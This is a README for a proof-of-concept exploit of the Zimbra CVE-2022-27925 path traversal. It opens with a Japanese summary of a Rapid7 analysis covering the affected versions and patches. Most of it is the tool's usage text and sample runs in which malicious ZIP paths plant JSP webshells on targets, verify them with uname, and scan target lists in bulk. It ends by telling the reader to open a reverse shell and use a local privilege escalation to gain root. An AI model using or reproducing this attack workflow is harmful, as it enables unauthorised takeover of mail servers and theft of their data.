
Zimbra CVE-2022-27925 PoC
2022年5月10日、Zimbraは、Zimbra Collaboration Suiteの複数の脆弱性に対処するため、バージョン9.0.0パッチ24および8.8.15パッチ31をリリースしました。これには、以前に取り上げたCVE-2022-27924とCVE-2022-27925が含まれます。
当初、ZimbraはCVE-2022-27925を認証済みパストラバーサル攻撃と呼んでいました。管理者ユーザーがZimbraアカウントとしてファイルシステム上の任意のディレクトリにファイルを書き込めるというものです。当初は管理者のみが利用できる攻撃と考えられていたため、NVDはCVSSベーススコア7.8を割り当てました。その後、Volexityは、この脆弱性を悪用する攻撃者が管理者要件を回避する方法を見つけたことに気づき、2022年8月10日にこれについて記述しました。この新しい認証バイパスには、CVE-2022-37042という新しい識別子が割り当てられました。
元のパストラバーサル脆弱性と新しい認証バイパスを組み合わせることで、攻撃者は管理者ポート(デフォルトでは7071)を介して、匿名でZimbra Collaboration Suiteシステムをリモートから侵害できます。さらに、最近取り上げ、エクスプロイトも作成した、現在も未パッチの特権昇格の脆弱性と組み合わせると、これら3つの脆弱性により、未パッチのシステムでrootユーザーとしてリモートコマンド実行が可能になります。
公開アドバイザリでは言及されていませんが、当社の分析によると、Zimbra Collaboration Suite Network Edition(有料版)は影響を受け、Open Source Edition(無料版)は影響を受けません(脆弱なmboximportエンドポイントがないため)。影響を受けるバージョンは次のとおりです。
Zimbra Collaboration Suite Network Edition 9.0.0 Patch 23 (and earlier)
Zimbra Collaboration Suite Network Edition 8.8.15 Patch 30 (and earlier)
これらの脆弱性(およびZimbraのその他の脆弱性)は、広範囲にわたる悪用の標的となっているため、できるだけ早くパッチを適用するか、オフラインにする必要があります。侵害された疑いがある場合、Zimbraは最新パッチでデータを失わずにZimbra Collaboration Suiteサーバーをゼロから再構築する手順を提供しています。
出典: https://attackerkb.com/topics/dSu4KGZiFd/cve-2022-27925/rapid7-analysis
_____ _ __
/__ / (_)___ ___ / /_ _________ _
/ / / / __ `__ \/ __ \/ ___/ __ `/
/ /__/ / / / / / / /_/ / / / /_/ /
/____/_/_/ /_/ /_/_.___/_/ \__,_/
CVE-2022-27925
usage: exploit.py [-h] [-t TARGET] [-l LIST]
options:
-h, --help show this help message and exit
-t TARGET, --target TARGET
URl with protocol HTTPS
-l LIST, --list LIST List of targets
root@root# python exploit.py -t zimbra.example.com
_____ _ __
/__ / (_)___ ___ / /_ _________ _
/ / / / __ `__ \/ __ \/ ___/ __ `/
/ /__/ / / / / / / /_/ / / / /_/ /
/____/_/_/ /_/ /_/_.___/_/ \__,_/
CVE-2022-27925
[!] Testing URL: https://zimbra.example.com
[!] Target is up!
[!] Creating malicious ZIP path: ../../../../mailboxd/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[+] Webshell works!!
[+] WebShell location: https://zimbra.example.com/zimbraAdmin/BQOQBN.jsp
[+] Uname -a output: Linux zimbra.docker 3.10.0-1127.8.2.el7.x86_64 #1 SMP Thu May 7 19:30:37 EDT 2020 x86_64 x86_64 x86_64 GNU/Linux
root@root# python exploit.py -l targets.txt
_____ _ __
/__ / (_)___ ___ / /_ _________ _
/ / / / __ `__ \/ __ \/ ___/ __ `/
/ /__/ / / / / / / /_/ / / / /_/ /
/____/_/_/ /_/ /_/_.___/_/ \__,_/
CVE-2022-27925
[!] Testing URL: https://patched.example.com
[!] Target is up!
[!] Creating malicious ZIP path: ../../../../mailboxd/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable
[!] Creating malicious ZIP path: ../../../../jetty_base/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable
[!] Creating malicious ZIP path: ../../../../jetty/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable
[!] Testing URL: https://zimbra.example.com
[!] Target is up!
[!] Creating malicious ZIP path: ../../../../mailboxd/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[+] Webshell works!!
[+] WebShell location: https://zimbra.example.com/zimbraAdmin/7RRT4G.jsp
[+] Uname -a output: Linux zimbra.docker 3.10.0-1127.8.2.el7.x86_64 #1 SMP Thu May 7 19:30:37 EDT 2020 x86_64 x86_64 x86_64 GNU/Linux
[!] Creating malicious ZIP path: ../../../../jetty_base/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[+] Webshell works!!
[+] WebShell location: https://zimbra.example.com/zimbraAdmin/7RRT4G.jsp
[+] Uname -a output: Linux zimbra.docker 3.10.0-1127.8.2.el7.x86_64 #1 SMP Thu May 7 19:30:37 EDT 2020 x86_64 x86_64 x86_64 GNU/Linux
[!] Creating malicious ZIP path: ../../../../jetty/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[+] Webshell works!!
[+] WebShell location: https://zimbra.example.com/zimbraAdmin/7RRT4G.jsp
[+] Uname -a output: Linux zimbra.docker 3.10.0-1127.8.2.el7.x86_64 #1 SMP Thu May 7 19:30:37 EDT 2020 x86_64 x86_64 x86_64 GNU/Linux
[!] Testing URL: https://patched.example.com
[!] Target is up!
[!] Creating malicious ZIP path: ../../../../mailboxd/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable
[!] Creating malicious ZIP path: ../../../../jetty_base/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable
[!] Creating malicious ZIP path: ../../../../jetty/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable
root@root# .
ボックスをルート化するには、リバースシェルを呼び出してから、Slaper's LPE を使用してください。